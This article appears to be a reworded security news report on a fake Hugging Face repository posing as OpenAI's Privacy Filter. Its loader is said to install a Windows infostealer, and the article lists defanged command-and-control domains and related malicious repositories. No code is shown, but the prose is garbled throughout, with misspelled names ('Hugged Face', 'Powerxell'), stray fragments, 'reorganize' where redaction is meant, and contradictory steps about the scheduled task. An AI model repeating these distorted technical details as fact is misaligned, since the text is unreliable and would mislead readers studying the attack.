Fake OpenAI Privacy Filter Repo Hits #1 on Hugged Face, Draws 244K Downloads
The malicious Hugging Face repository has managed to take a place in the trending platform list by posing as the open weight model of OpenAI Privacy Filter to bring a Rust-based hacker to Windows users.
This project, called Open-OSS/privacy-filter, made as an official counterpart, released by OpenAI late last month (openai/privacy-filter), including copying the entire description verbatim to trick unwary users into downloading it. Access to the malicious model has since been blocked by Hug Face.
Privacy Filter was launched in April 2026 by an artificial intelligence (AI) company as a way to find and reorganize personally identifiable information (PII) in unstructured text with the aim of incorporating strong privacy and security protection into applications.
“The repository cloned the official OpenAI Privacy Filter release, copied its model card almost verbatim, and sent a loader.py file that downloads and executes the infostealer malware on Windows machines,” the HiddenLayer Research Team said in a report published last week.
The malicious project instructs users to compile the repository and run a batch script (“start.bat”) for Windows or a Python script (“loader.py”) for Linux or macOS systems to configure all necessary dependencies and start the model.
Once started, the Python script executes the malicious code responsible for disabling SSL authentication, deciphers the Base64-encoded URL hosted in JSON Keeper, and uses it to issue a command passed to PowerShell to do the following. the warehouse.
A PowerShell command is used to download a batch script from a remote server (“api.eth-fastscan[.]org”) and run it using “cmd.exe.” The cluster script acts as a second-stage downloader that prepares the environment by elevating its privileges through a quick User Account Control (UAC), fixing the exclusion of Microsoft Defender Antivirus, downloading the next-stage binaries to the same domain, and stopping a scheduled task that starts Powerxell.
Once the scheduled task is started, the malware waits for two seconds before deleting itself. The last category is an information stealer designed to take screenshots and harvest data from Discord, cryptocurrency wallets and extensions, system metadata, files like FileZilla settings and wallet seed phrases, and web browsers based on Chromium and Gecko rendering engines.
“Despite using a scheduled task, this layer does not guarantee persistence: the task is destroyed before any restart. It is used as a one-shot SYSTEM content launcher,” explains HiddenLayer.
The attacker also performs checks for debuggers and sandboxes, makes sure that it is not running on the virtual machine, and tries to disable Windows Antimalware Scan Interface (AMSI) and Windows Event Tracing (ETW) to avoid behavioral detection. The stolen data is presented in JSON format to “recargapopular[.]com” domain.
Before it was disabled, the model was said to have reached the #1 trending spot on Hugging Face with nearly 244,000 downloads and 667 likes within 18 hours. It is suspected that these numbers were artificially powered to give the cache the illusion of credibility and make users download it.
Further analysis of the work found six other repositories that include the same Python loader for exploiting –
- anthfu/Bonsai-8B-gguf
- anthfu/Qwen3.6-35B-A3B-APEX-GGUF
- anthfu/DeepSeek-V4-Pro
- anthfu/Qwopus-GLM-18B-Integrated-GGUF
- anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
- anthfu/supergemma4-26b-uncensored-gguf-v2
HiddenLayer said it also saw “api[.]eth-fastscan[.]org” domain used to provide a different Windows executable (“o0q2l47f.exe”) that flashes to “welovechinatown[.]info,” a command-and-control (C2) server previously used in a campaign that used a malicious npm package called trevlo to deliver ValleyRAT (aka Winos 4.0).
“The package’s post-installation hook silently creates an obfuscated JavaScript loader that displays a base64-encoded PowerShell command, which then downloads and executes a second-level PowerShell script on an attacker-controlled infrastructure,” Panther noted last month.
“That script downloads and executes a fully executable Winos 4.0 stager (“CodeRun102.exe”) binary, complete with hidden window signing, Zone Identifier removal, and process isolation.”
This attack is notable because it represents the first new access vector for ValleyRAT, a remote access trojan known to be distributed via phishing emails and search engine optimization (SEO) poisoning. The use of ValleyRAT has only been attributed to a Chinese hacker group called Silver Fox.
“The shared infrastructure suggests that these campaigns are likely to be interconnected and part of a wider supply chain targeting open natural resources,” HiddenLayer said.
